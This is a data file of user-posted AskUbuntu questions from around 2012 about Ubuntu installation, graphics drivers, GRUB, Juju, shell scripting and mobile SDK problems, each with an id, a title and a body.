235711	12.04 lts , update-manager behaves contradictory ?	i have installed ubuntu 12.04 lts two weeks ago by downloading the iso image , creating a startup usb stick from this image , booting the live system and finally installing . i have been working successfully during these two weeks in order to get everything i need up and running . : - ) since most of the software needed is properly working i decided to tell the update-manager to look for packages to update . after downloading the package information the update-manager says ( 1 ) `` the software on this computer is up to date . the package information was just updated '' . however , immediately after this , a second dialog pops up and says ( 2 ) `` not all updates can be installed . run a partial upgrade , to install as many updates as possible '' . if the software is up to date , there should be nothing to install , so ( 2 ) contradicts ( 1 ) . choosing the offered `` partial upgrade '' results in ( 3 ) `` upgrading over remote connection not supported . you are running the upgrade over a remote ssh connection with a frontend that does not support this . please try a text mode upgrade with 'do-release-upgrade ' . '' finally , launching do-release-upgrade on the console ( e.g . ctrl-alt-f5 ) reports ( 4 ) `` checking for a new ubuntu release . no new release found . '' since ( 4 ) supports ( 1 ) , it does not matter if upgrading by means of a remote connection is supported ( 3 ) . please give me a hint how to get the update-manager properly working . i ca n't tell , if my installation is complete and up to date or if there are package updates available , i should install but my package management has an aching stomach . kind regards , berket
235713	how to detect processor correct temperature in conky	i am using conky & conkyforecast to have a nice widget containing some system information and weather data . but i can see that the temperature that conky shows is different than the one i get running in terminal sensors . conky script line : temperature : $ { alignr } $ { acpitemp } °c running sensors in terminat gets this : florin @ florin-satellite-c650 : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +49.0°c ( crit = +110.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +51.0°c ( high = +80.0°c , crit = +90.0°c ) core 2 : +60.0°c ( high = +80.0°c , crit = +90.0°c ) conky shows 49° temperature . how can i make them show the same temperature ? what does conky show over there ? thanks a lot !
235714	dependency is not satisfiable ibqt4-dbus ( > = 4:4.7.4 )	i am trying to install b1freearchiver_current_stable_i386 , but , i get an error that : b1freearchiver : depends : libqt4-dbus ( > = 4:4.7.4 ) but 4:4.7.0-0ubuntu2~lucid1~ppa2 is to be installed after installing libqt4-dbus iget this one : this package is uninstallable dependency is not satisfiable : libqt4-dbus ( > = 4:4.7.4 ) is there any way to get around this ? thanks in advance..
235717	in ubuntu displays , why does it say i 'm using a laptop but i 'm using a desktop ?	i 'm using ubuntu on oracle 's virtual box aside from windows because the vast of my friends are trying to get me to try it , i open it and activate full screen mode , yet it is n't all fullscreen . i enabled 2d acceleration and in 'displays ' ubuntu says i 'm using a laptop , when actually i 'm using a desktop . is this just a bug , or is there some way i can fix it myself ?
235721	can anyone manage to correctly configure environments.yaml with a rackspace cloud ?	i have already read all official documentary , blog posts and have talked to rackspace support but there is nothing clear on that topic . my environments.yaml file looks like this : environments : default : type : openstack provider : rackspace rackspace_username : infinidad rackspace_api_key : ****************************** control-bucket : juju-**************************** admin-secret : *********************************** default-series : precise ssl-hostname-verification : true and when i juju bootstrap , the terminal says : traceback ( most recent call last ) : file `` /usr/bin/juju '' , line 8 , in < module > main ( sys.argv [ 1 : ] ) file `` /usr/lib/python2.7/dist-packages/juju/control/__init__.py '' , line 183 , in main env_config.load_or_write_sample ( ) file `` /usr/lib/python2.7/dist-packages/juju/environment/config.py '' , line 229 , in load_or_write_sample self.load ( ) file `` /usr/lib/python2.7/dist-packages/juju/environment/config.py '' , line 115 , in load self.parse ( file.read ( ) , path ) file `` /usr/lib/python2.7/dist-packages/juju/environment/config.py '' , line 138 , in parse config = schema.coerce ( config , [ ] ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 266 , in coerce new_dict [ k ] = self.schema [ k ] .coerce ( v , path ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 233 , in coerce new_subvalue = self.value_schema.coerce ( subvalue , value_path ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 301 , in coerce return self.schemas [ selected ] .coerce ( value , path ) keyerror : 'openstack' it 's quite frustrating . can anyone manage to correctly configure that file with a rackspace cloud ?
235722	how do i know if my laptop support switchable graphics and how to switch to it ?	i am having issues installing the ati drivers on my laptop ; just wanted to know a way if my laptop support switchable graphics so that i can switch to integrated graphic card for better experience on ubuntu-graphics . -- -- -- -- -- hardware specification -- -- -- -- -- -- - sockets @ ankit : /tmp $ lspci | grep -i vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m series ] the above results show that i also have integrated intel vga controller ; how can i switch to this graphic card permanently if it is well supported by ubuntu ?
235723	how do you use sed to edit a csv file ?	i have a csv file like this : hostname1 | role1 | environment | tag , list | | hostname2 | role2 | environment | tag , list , longer | | hostname3 | role3 | environment | | | i need a sed expression that adds to the column with the tags ( the 4th column ) a new tag if there are no tags already , and inserts a new tag with a comma if there are existing tags . i have tried this : sed `` s/\ ( ^ $ server |.*| . *|\ ) \ ( .*| . *| $ \ ) /\1 new , \2/ '' testfile.csv where server is defined externally like so : server= '' hostname2 '' but it does n't work , and it does n't deal with the comma if the tag list is empty . how would you do this with sed ?
235725	apt-get gcc 4.7 multilib	i followed the instructions from @ jokerdino here in askubuntu sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update sudo apt-get install gcc-4.7 but to get a successful compilation i 've had to : export library_path=/usr/lib/x86_64-linux-gnu sudo ln -s /usr/lib/x86_64-linux-gnu/crti.o /usr/lib64/crti.o sudo ln -s /usr/lib/x86_64-linux-gnu/crtn.o /usr/lib64/crtn.o which i understand effectively breaks the ubuntu multilib model . so how do i compile the correct way and remove the links ? because now i 'd like to cross-compile for 32 bits . ( using precise )
235728	sending e-mail with my ip using wget	i have a computer that every 5 hours change is ip i want to make a script that will run every hours with this command - wget -q -t 5 -- output-document=- `` http : //automation.whatismyip.com/n09230945.asp '' and send me the ip that he is getting . how do i do this ? and is it possible to do ? thanks .
235732	delete a file without having permission	can you delete a file in linux without having nor permission or root access ? thank you .
235735	cant download qt-components-ubuntu on my machine	i was trying to get some hands on ubuntu mobile app development and followed the instructions of downloading the qt5-beta . but i was not able to get following components to get installed on my ubuntu 12.04 machine . am i missing anything on my apt-get ? seems the package hosting server is not available for the below packages . on apt-get update : failed to fetch http : //ppa.launchpad.net/ui-toolkit/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found on trying to install from different packages e : unable to locate package qt-components-ubuntu e : unable to locate package qt-components-ubuntu-demos e : unable to locate package qt-components-ubuntu-examples e : unable to locate package qt-components-ubuntu-doc e : unable to locate package notepad-qml appreciate your help in resolving this . thanks .
235742	liferea plain text downloads ?	have any liferea ( linux feed reader ) users been able to download plain text copies of their rss feeds ? i understand that it provides for offline viewing , so i assume that some sort of local caching is taking place , but do n't know php so i ca n't modify it myself . https : //sourceforge.net/projects/liferea/ ? source=navbar if impossible in liferea , does anyone know of a simple way to download plain text copies of an rss feed ?
235743	why ca n't i install 11.10 or 12.04 , just on my windows 7 machines ?	i attemted several times to install ubuntu 11.10,12.04 and 12.10 in my windows 7 computers with no success . will work great in my old xp computers . can you help ?
235744	'disable touchpad ' keyboard shortcut does n't work	i have a dell inspiron 5110 laptop . when i press the keyboard shortcut to disable the touchpad ( fn+f3 ) it shows this in the corner of the screen : but it does not actually disable the touchpad . this works perfectly on windows . in fact , other than the notification , it does n't seem to do anything : the light on the touchpad does n't come on ( it lights up when the touchpad 's off under windows ) and the notification always shows the same image , like the computer does n't even know it 's supposed to be disabled . is there a way to make this work right ? update : i followed the instructions on getting hardware details & could n't find anything that looked relevant . here are the contents of /var/log/dmesg and /var/log/udev ; i did n't know what to look for in them .
235748	configuring internet in ubuntu12.10 lenovo g580	i have bought lenovo g580 and wanted to install ubuntu 12.10 , i am very fresher to use it . i have installed it using windows installer . but internet was not detecting ... please suggest what to be done after installation ( like any settings etc )
235750	os selection menu not appearing on system with ubuntu and windows 8 installed	i recently installed ubuntu 12.10 on my lenovo g570 with 2nd gen dual core processor with 2 gb ram with pre installed windows 8 pro . whenever i start my system , it automatically loads windows 8 . when i go into msconfig , it shows only 1 os i.e . windows 8 . everywhere in windows where it shows the installed oss , it shows only windows 8 pro . i installed ubuntu on a separate partition of 15 gbs and the installation was successful . i wanted to install ubuntu inside windows 8 using wubi but whenever i tried that , my system automatically restarted . so my problem is that i am not able to load ubuntu .
235751	neither mobile broadband nor wireless connects on ubuntu whereas it does in windows 7 running parallely	i am using ubuntu 12.04 on my dell inspiron n5010 . i read almost all the posts available but could n't get my internet connection established . i have an mts mblaze usb net connect . i added the device using the network options giving all my details ( place , time and all ) . now when i run it , it does n't work . firstly a message appears saying connection established and then a message of network disabled follows it immediately .
235753	nvidia problems with optirun when running warcraft	problem : i have nvidia problems i do n't know what happen because when i run warcraft with optirun it display errors then if i type optirun glxgears , it displays the same errors as when im running warcraft .. optirun glxgears [ 25.424416 ] [ error ] the bumblebee daemon has not been started yet or the socket path /var/run/bumblebee.socket was incorrect . [ 25.424460 ] [ error ] could not connect to bumblebee daemon - is it running ? how to fix this ? pc specs : ubuntu 12.04 64 bit with a nvidia geforce gt 630m i used lspci | grep vga which gave me : lspci | grep vga 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) it seems my laptop does not detect my nvidia geforce gt 630m anymore . it worked before i knew that my optirun is broken , i did n't do anything . i just installed geany recently and make a virtual host and oh yes , i use ctrl + alt + sys req + reiusb because i had my laptop freeze few hours ago please if anyone can help i will really appreciate it . solution i have already posted my solution as an answer below . note : i already had bumblebee installed . it worked before , but all of a sudden my laptop suddenly does n't recognize my vga.. new questions why did my initial problem arise ? is it because i used ctrl + alt + sys req + reiusb ? ? yes i typed it reiusb and not reisub.. why did my solution work ? i already searched in google and didnt find any good/clear answer ( the answers too hard for newbie to understand ) please answer with details because im a newbie in ubuntu and also in computer .. i just installed ubuntu 2 weeks ago so i can learn about computer .
235760	unity does not appear after installing proprietary nvidia drivers ( gpu has fallen of the bus / acpi failed )	before starting i should mention that even though the title is similar to the following questions , is not the same problem and i have already tested the answers of this questions with no solution in hand : unity does n't appear after installing nvidia drivers unity not loading after installing nvidia proprietary drivers ( i wish it were that easy ) . the problem started about 2 weeks ago ( using 12.10 64 bit ) . after an upgrade , unity would not load . it just froze in a black screen , no mouse movement , no nothing . i went to recovery mode to see what had happened . at first i removed the nvidia driver and the system booted correctly . i then installed the nvidia driver ( using the nvidia-current that comes by default with no additional ppa installed ) and the problem appeared . i then try the ppa for x-swat and the ppa from xorg edgers , both of which also failed with the same problem . i continued checking the /var/log files , specially the xorg and syslog ones to see what had happened . after trying stuff like sudo modprobe nvidia i saw that the module was not correctly created , hence i did not have for example the nvidia-xconfig command . so i downloaded all header files needed ( generic and the specific version ) and reinstalled the nvidia drivers . this time the module was installed and i could have access to all nvidia commands like nvidia-xconfig to create the xorg.conf file for example . but the same problem persisted . it would not load unity , it would get stuck right before showing the desktop in a black screen . after checking some more as my pastebin file shows there were some problems between acpi and the x server . on line 55 we can see the following : 48.651 ] ( ww ) open acpi failed ( /var/run/acpid.socket ) ( no such file or directory ) and then starting on line 178 we can see the following : [ 49.993 ] ( ii ) nvidia ( 0 ) : acpi : failed to connect to the acpi event daemon ; the daemon [ 49.993 ] ( ii ) nvidia ( 0 ) : may not be running or the `` acpidsocketpath '' x [ 49.993 ] ( ii ) nvidia ( 0 ) : configuration option may not be set correctly . when the [ 49.993 ] ( ii ) nvidia ( 0 ) : acpi event daemon is available , the nvidia x driver will [ 49.993 ] ( ii ) nvidia ( 0 ) : try to use it to receive acpi event notifications . for [ 49.993 ] ( ii ) nvidia ( 0 ) : details , please see the `` connecttoacpid '' and [ 49.993 ] ( ii ) nvidia ( 0 ) : `` acpidsocketpath '' x configuration options in appendix b : x [ 49.993 ] ( ii ) nvidia ( 0 ) : config options in the readme . right now this could be the problem ( this is as far as i have gotten right now ) . as it looks , this is an old bug very weird to reproduce and before this , the pc was working fine . this is an intel dz68db motherboard with an nvidia 560 ti video card . there have been also other distros that have had the same problem : arch linux gentoo red hat i have also checked to see if i had acpid installed already and yes . it is running correctly . for what i have understood , it is a timing issue where the x server and acpid try to load asynced so x loads faster , but since it loaded before acpid , it gets this error when the nvidia card wants to use acpi . so a reset of x would help since acpid would be loaded before the second x server but since the system is frozen this is not doable . the last error i found while doint my checks was with sudo cat /var/log/syslog | grep nv which gave me this : jan 3 22:39:23 cyrex kernel : [ 3.789322 ] nvrm : gpu at 0000:01:00.0 has fallen off the bus . so now i have a `` gpu has fallen off the bus '' issue . how fast was that bus going i wonder ? i should add that i have tested all versions that come with 12.10 ( nvidia-current , updates , experimental ) and also the ones that come in x-swat ppa and xorg edges ppa . all give the same problems . update 1 - test 1 did a test in the following way : connected the ssd i was using to another computer that also had an nvidia card , this time a 9500 gt . i also connected the other computer 's hdd to my computer . basically switching hard drives . ubuntu in the other computer is working fine , but the hdd that was working before on the other computer , when i connected it to my computer it gave the same error as mentioned in this question . in this test , the only thing i changed was the computer for the ubuntu i was using and it worked . but if i used another ubuntu from another computer on mine , the error appears , showing that the hardware might be the problem . at least i will need to check the bios setup . update 2 - test 2 removed the video card and did an exchange of it with the other computer . it still worked . so i had , the ssd that had ubuntu not working on the other computer , with the same 560 ti that was not working and even then it still worked . the only thing left was the motherboard , it is the intel dz68db with already upgraded firmware . i find it odd that it was working 2 weeks ago and not anymore , but this shows that the problem might be bios configuration or motherboard not compatible somehow . i 'll keep testing . solution 1 ( not working for me ) - some users have reported that doing the following helped them : edit your /etc/rc.local file : sudo nano /etc/rc.local and add the following line before the exit 0 statement : /usr/bin/nvidia-smi -pm 1 save and reboot . this will set your video card to persistence mode . to see if it worked , after reboot type : /usr/bin/nvidia-smi -q | grep -i persistence and if you see : persistence mode : enabled then you know it is enabled solution 2 ( not working for me ) - some users have reported that doing the following helped them : edit your grub menu : sudo nano /etc/default/grub and in the line that says : grub_cmdline_linux_default= '' quiet splash '' add to it one or all of the following kernel options : acpi=noirq thermal.off=1 for example if add both it should look like this : grub_cmdline_linux_default= '' quiet splash acpi=noirq thermal.off=1 '' now save and type update-grub . then reboot . for anybody with similar problems , if they have done everything , i recommend also trying out the tests i have conducted . that way you know if it is ubuntu , the video card or any other hardware .
235763	why ubuntu.components 0.1 missing from qtcreator ?	first of all i need to create a `` hello world '' app using qml & qt creator as described here http : //developer.ubuntu.com/get-started/gomobile/ second , when i was trying to install qml platform and the dependencies i could n't run the step 2 ( of `` install the ubuntu qml toolkit preview '' ) because i have a distro ( backbox ) based on ubuntu 12.04 but i solve it by following the instructions of this post : how do i install the qml toolkit on 12.04 ? third , when i open qtcreator and trying to execute currencyconverter ( helloworld app ) the program ca n't find the following packages : import ubuntu.components 0.1 what can i do in order to run the app ? thanks in advance . import qtquick 2.0 import ubuntu.components 0.1 rectangle { id : root width : units.gu ( 60 ) height : units.gu ( 80 ) color : `` lightgray '' property real margins : units.gu ( 2 ) property real buttonwidth : units.gu ( 9 ) label { id : title itemstyle.class : `` title '' text : i18n.tr ( `` currency converter '' ) height : contentheight + root.margins anchors { left : parent.left right : parent.right top : parent.top } } }
235764	is the ubuntu mobile sdk available for mac os x or windows ?	i 'm a mobile app developer . i code for android and ios on mac os . i do n't want to buy another computer just to code for ubuntu mobile . will the ubuntu mobile sdk be available for mac os or windows ?
235768	best way to put sensitive files on web server and keep them fro being accessible ?	i need to put a private key on my web server for use with a php script , so i need the web server to be able to access the file in php script , but not allow users from the outside to be able to access this file . basically what i 'm asking is where is the best place to put the file in the file system , and how do i set permissions/what are the correct permissions to set ? i have a newly setup ubuntu 11.04 server , and i am using the lamp package .
235769	terminal show multiple languages	at work , i need to connect to databases , and these database contain fields that hold chinese , russian , spanish , japanese , etc . characters . when pulling them up in my terminal , i get question marks . i know there is a way to show the actual characters instead of question marks , but how ? : ~ $ locale on the remote results in : lang=en_us.utf-8 lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all= : ~ $ locale on the clint results in : lang=en_us.utf-8 language= lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all=
235772	how i can install a brother dcp-j715w	the system settings see it under network printer , but there is no such model on the database list , and when i go to `` search for a printer driver to downlaod '' , it says there is `` no matches found '' . where can i get the appropriate driver ?
235774	screenlet behaves like it has no underlying window	i 'm trying to write a screenlet from scratch following this guide http : //www.ibm.com/developerworks/linux/library/l-script-linux-desktop-1/index.html . i have created the hello world ! example but when testing it i ca n't click on it , like the screenlet is being drawn directly on the desktop and it has no underlying window . when right-clicking on it the desktop context menu appears . i tried printing self.window and this seems to be a regular gtk.window object .
235775	how can i restore the default ubuntu splash screen ?	i recently changed my desktop environment to gnome shell and my login manager to gdm . as i applied these changes , the splash screen shown at boot has changed too . now i no longer see the ubuntu logo with the purple background and the white dots , but instead the default gnome wallpaper ( blue stripes ) . how can i restore the default splash screen ?
235777	ubuntu 12.10 skype 4.1 can not properly run wrapper	i installed downloaded skype from official website `` ubuntu 12.04 ( multiarch ) '' and installed it . then i followed these steps : quit skype if running uninstall skype if you installed it from the repositories . reboot choose your skype version ( 32/64 bit ) to download and install it make sure you added the repository ppa : skype-wrapper/ppa in terminal console , run sudo add-apt-repository ppa : skype-wrapper/ppa sudo apt-get update & & sudo apt-get install skype-wrapper python-skype after that , run in terminal console skype-wrapper acknowledge the pop up authorization requests ( do n't forget to check the boxes to remember the selection ) restart and done ! link to the original answer http : //askubuntu.com/a/123304/42591 but sadly none of the functions of skype wrapper are working . is there a way to fix this ?
235782	intel technology & nvidia hybrid drivers	i have a samsung laptop ( qx510-s01gr ) which has 2 graphics cards , an intel hd graphics one and a nvidia gt420m one . so , the question here is there a hybrid driver for ubuntu 12.10 or not yet ? also i would like to know if there is a driver supporting intel turbo boost technology , because when i m running windows 8 , the temperature ( and the noise ) of my laptop is really low due to this technology & the hybrid drivers .
235783	optimizing unity 3d launcher	i had been using synapse and docky for launching application and finding files . i really love unity but i am seriously facing problem when i want it to appear quickly and search quickly application and documents for me . can any one help me how to optimize it for better performance ? what are the ideal hardware specs for unity 3d ? is canonical serious to make it a polished interface for power users ?
235784	fix order of window buttons in xfce panel	soon after installing xubuntu , i moved the default dock from the bottom of the screen to the left , and added a regular panel in the bottom with the window list . however , as i open windows , the window list does n't show them in order . i expected them to be sorted from left to right , newer ones on the right , but this does n't happen . how can i make the panel sort the windows correctly ?
235789	developing for ubuntu phone : where is the sdk ?	i was quickly reading this introduction to qml for ubuntu phones , now i was honestly expecting something more than that from canonical . my questions are : where is a real sdk with libs ? all i can see are apis qml really is the alternative to html5 apps ? it 's basically the same thing without any real benefit . there will ever be a true native toolkit with c/c++ toolchains , libs , headers and all the bits and stuff ? how to package applications for ubuntu phones ? there is an emulator for the ubuntu os for phones ?
235791	ubuntu 12.10 64 bit slow	i am new to linux and was wondering why launching applications is so slow . i 've tried both ubuntu 12.10 64 bit and ubuntu 12.04 lts 64 bit computer specs : toshiba satellite p755 cpu : intel core i7-2670qm @ 2.20ghz ram : 8 gb using integrated intel hd 3000 graphics when i install the first thing i do is update , which takes about an hour or so . i would assume i 'd be good after that , but when launching things like the firefox , system settings , thunderbird it takes a much much longer time than on windows 7 . please help me .
235792	how do i solve the `` out of disk space '' error thrown by grub ?	trying to boot into ubuntu 12.04 live cd , i get the following error : error : out of disk space grub > rescue when i try grub commands it does n't recognize them .
235795	can ubuntu mobile be installed on a nokia lumnia 800 ?	can i install the ubuntu mobile operating system on a nokia lumnia 800 ? this phone has 512 mb of memory 512 and the a 1.4 ghz cpu .
235797	custom 12.10 panel	i 've done quite a bit of research on this and do n't believe it 's possible but i figured i 'd throw the question out there anyway and see what kind of answers i get . i 'm looking for a way to customize the panel in ubuntu 12.10 . i believe this is the unity panel ( feel free to correct me if i 'm wrong ... i 'm fairly new to linux and new to ubuntu ) . i am specifically looking to center the time on the panel . i would like to explore other customization if possible but i figured i 'd start with something simple . thanks in advance !
235800	partition hard drive on ubuntu phone	i currently have a samsung galaxy nexus ( the same phone used in the ubuntu phone video ) and i would like to know if there is any way to partition the hard drive so i can still run android as well as ubuntu .
235801	does wubi work on aspire one with windows 8 pre-installed ?	i bought an aspire one 725 pre-loaded with windows 8 ( i did n't know what i was getting into ) . i am a novice when it comes to installing operating systems , so i would like to use a windows installer so that i do n't screw everything up and to try out a linux distro . is there one that will work on this computer ? i would like to use wubi.exe , but i 've heard that it may or may not work .
235805	how to add drive/partition-icon to the launcher ?	my dualboot-system ( win7 / ubuntu 12.04 ) has a ntfs-formatted partition called `` /share '' for files i use both in win7 and ubuntu ( e.g . pictures , music etc. ) . i 'd like to have a symbol of this drive in the launcher . but although the partition is mounted ( mount point : /media/share ) and shown in the left side bar of a folder , there is no icon in the launcher ! how can i add this icon to the launcher ? ( compizconfig setting manager > > ubuntu unity plugin > > experimental > > show devices always '' will only show win-partition , not the /share -partition )
235807	moving flickering graphic on ubuntu desktop	i have a graphics issue in ubuntu . there is a pattern of random short lines that flicker and move slowly across the screen . i have a dual monitor setup and the pattern first occurs on the top left of the second monitor , then slowly moves right and wraps over such that it continues on the first monitor , shifted down by a few pixels . i have a nvidia gtx 580 , running with the proprietary nvidia drivers . i would not exclude the possibility that there may be some hardware failure , as my card has been dropping some white powder , which apparently may be a sign that some capacitors are going to fail soon . i would like to know whether this is a known phenomenon/bug though and if there 's any possibility to fix this . however , i will test more carefully with a second video card . here is a screenshot of the pattern : the whole pattern flickers , with the two lines at the right also changing color from black to white .
235815	how to burn iso of a program on usb ?	i want to burn the iso of a program ( specifically the matlab iso ) on to a usb stick with ubuntu . just to make it clear what ? burn iso of program where ? on usb stick using which os ? ubuntu to install matlab you can burn the iso onto a dvd , but i will like to do it on my usb stick ; i read somewhere that it was possible i am not trying to burn the image of ubuntu , to do that you can easily use the startup disk creator . however you can not use it to install a iso that is not a os
235817	ubuntu router breaking internet radio streams	i have ubuntu 12.04 up and running fine as a dhcp router with great throughput to my connected devices . two single nic 's ( one onboard and one pci-e , both with realtek 8111e chips ) are used as wan and lan interfaces where the lan side is connected to an apple airport extreme basestation which shares the connection to my devices over ethernet and wifi . all cables are cat5 or higher spec . my problem occurs when attempting to stream internet radio through a yamaha home theatre receiver . the internet radio is provided by vtuner . the stream buffers up and plays for around 4mins after which the receiver states 'no connection ' , it reconnects and jumps back to the channel list . when using my apple airport extreme router to provide dhcp and using nat-pmp ( i.e . without the ubuntu router connected ) , i am not having this issue , whatever settings i use in the ap extreme . the issue remains if the receiver is connected directly to the ubuntu router , so the airport extreme has been ruled out as a source of the problem . i have not written the script which handles my dhcp and firewalling myself , so i am at a loss when it comes to troubleshooting how it may affect the streaming . this is the script which is placed in init.d # ! /bin/sh inet_iface= '' eth0 '' inet_ip=`ifconfig eth0 | grep inet | cut -d : -f 2 | cut -d ' ' -f 1` lan_ip= '' 10.0.0.1 '' lan_ip_range= '' 10.0.0.2/25 '' lan_bcast_adress= '' 10.0.0.254 '' lan_iface= '' eth1 '' lo_iface= '' lo '' lo_ip= '' 127.0.0.1 '' # setup settings for gateway functions echo `` 1 '' > /proc/sys/net/ipv4/ip_forward # sysctl -w net.ipv4.netfilter.ip_conntrack_udp_timeout_stream=360 # sysctl -w net.ipv4.netfilter.ip_conntrack_udp_timeout=60 # non-required proc configurations # echo `` 1 '' > /proc/sys/net/ipv4/conf/all/rp_filter # echo `` 1 '' > /proc/sys/net/ipv4/conf/all/proxy_arp # echo `` 1 '' > /proc/sys/net/ipv4/ip_dynaddr # flush all chains iptables -f iptables -x iptables -t nat -f iptables -t filter -f iptables -t mangle -f # policies iptables -p input accept iptables -p output accept iptables -p forward accept iptables -a input -p all -d $ inet_ip -m state -- state established , related -j accept iptables -t nat -a postrouting -o $ inet_iface -j snat -- to-source $ inet_ip iptables -a prerouting -t nat -p tcp -d $ inet_ip -- dport 12345:54321 -j dnat -- to 10.0.0.100 any help much appreciated ! i am fairly new to ubuntu and networking . best regards .
235823	problems with nvidia-settings and nvidia-xconfig	when i start nvidia-settings it gives me : you do not appear to be using nvidia x driver . please edit you x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . also , there are no settings available in this window . when i ran nvidia-xconfig ( as sudo ) , it generates this file : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.40 ( buildmeister @ swio-display-x86-rhel47-06.nvidia.com ) thu apr 5 22:40:54 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' fontpath `` unix/:7100 '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection then i reboot the system , and the only resolution available is somethink like 640x480 ( far away from native 1600x900 ) . if i restart x only the systems logs me out ( login screen ) , gives crappy resolution and whenever i log on , it immediately logs me out again . to solve this , i installed gdm and reconfigured it . i have a different login-screen now , which is not the main problem . ( i surely deleted xorg.conf and rebooted to get my resolution back everytime it was fu**ed up ) additional drivers says : nvidia_current , with a note beneath it : this driver is activated but not currently in use . system settings > system > details > graphics says : driver : unknown , experience : standard i use ubuntu 12.04.1 lts graphics card : geforce gt540m cuda ( tm ) 1gb i have tried to solve the problem every now and then and i get really frustrated with it . for not being able to play games with high settings , not being able to run an external monitor ( hdmi , tv ) with a resolution higher than 5xx x 7xx and so on . need any more information ? thanks in advance . additional information : output of lspci | grep vga is 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 )
235826	can juju deploy charms to an ec2 instance of windows server ?	can juju bootstrap and deploy to an ec2 cloud instance running windows server os , or can juju only boostrap/deploy to linux instances ? i am experimenting with juju for the first time and have installed juju on a ubuntu vm in virtualbox on my local machine . i also have an ec2 windows 2008 server instance that i was trying to bootstrap juju to without success . it could be that i have a other config issues with the yaml preventing the bootstrap from working , but i first want to be sure that juju can deploy to windows environment before wasting more time trying to fix the bootstrap issues .
235835	sudo apt-get remove unity	just what sort of problems would doing the above command lead to . i have installed kde desktop and would like a pure kde de . i understand theres kubuntu but i 've done so much with this one now that i 'd be loathe to do it all again .
235838	ca n't start unity from command line	for learning purposes , i 'm trying to start my gui ( unity ) on ubuntu 12.04 from the command line . i 've changed quiet splash in /etc/default/grub to text and i successfully booted into the command line . i was able to start x11 and play around with some lightweight window managers like icewm-lite . now i want to start the full unity desktop that 's default with ubuntu 12.04 , so i type unity in the command line and i get warning : no display variable set , setting it to :0 compiz ( core ) - fatal : could n't open display :0 unity-panel-service : no process found and unity does n't start . what am i doing wrong ?
235848	repairing grub 2 with ubuntu live cd	i installed windows 7 on a separate hard drive and i have debian on another hard drive . after installing windows 7 my grub does n't appear so i used an ubuntu live cd to use boot-repair to fix my grub2 installation . everything went well but after i restart it boots directly into windows 7 and no grub shows up . like i said i have two hard drives one with windows 7 ( sda ) and one with debian ( sdb ) . i installed grub2 on sdb following the boot-repair process but it does n't work . any ideas of what i should do . here is my boot info .
235849	how do i get my xbox360 controller to work in ubuntu 12.10 ?	i 'm trying to play the wâalking dâead on ubuntu 12.10 with my xbox360 controller like i do in windows . the thing is the game start and only lets my use the mouse and keyboard . in windows when the control is unplugged it start like that and when it 's plugged in it 's start in the xbox360 mode ( different bottons and so on ) . i tried installing the xbox360 driver as shown here but the ppa is missing . i also tried installing jtest and it recognizes the controller and all , but still i ca n't use it in the game .
235850	the setenv command is not found when trying to run a shell script . how do i fix this ?	i have a problem with a shell script , which looks like : # ! /bin/csh -f setenv test the problem is that it worked until i installed ubuntu 12.04 . the respond tells me that the command setenv is not found . my idea is that the bash does not change to the csh but how can i fix it ?
235861	how to associate jnlp file with javaws	my actual version of java is $ java -version java version `` 1.6.0_38 '' java ( tm ) se runtime environment ( build 1.6.0_38-b05 ) java hotspot ( tm ) 64-bit server vm ( build 20.13-b02 , mixed mode ) and it possible to run jnlp file as $ javaws contestappletprod.jnlp ( it 's topcoder contest arena ) but i want to run it with simple double click . when i do right click on file , there is `` open with other application '' option , but i do not know how to add javaws here .
235862	what are the partitions to create if i want to dual boot ubuntu 12.10 with windows 7 ?	i want to dual boot ubuntu 12.10 with windows 7 on my laptop . i checked some online guides but each one does it differently . some only create a / ( root ) partition and a swap partition while others create a / ( root ) partition , a boot partition , a home partition and a swap partition . which guide should i follow ? please help . and what size should i give every partition considering i am going to install ubuntu on 200gb of my 500gb hard drive ?
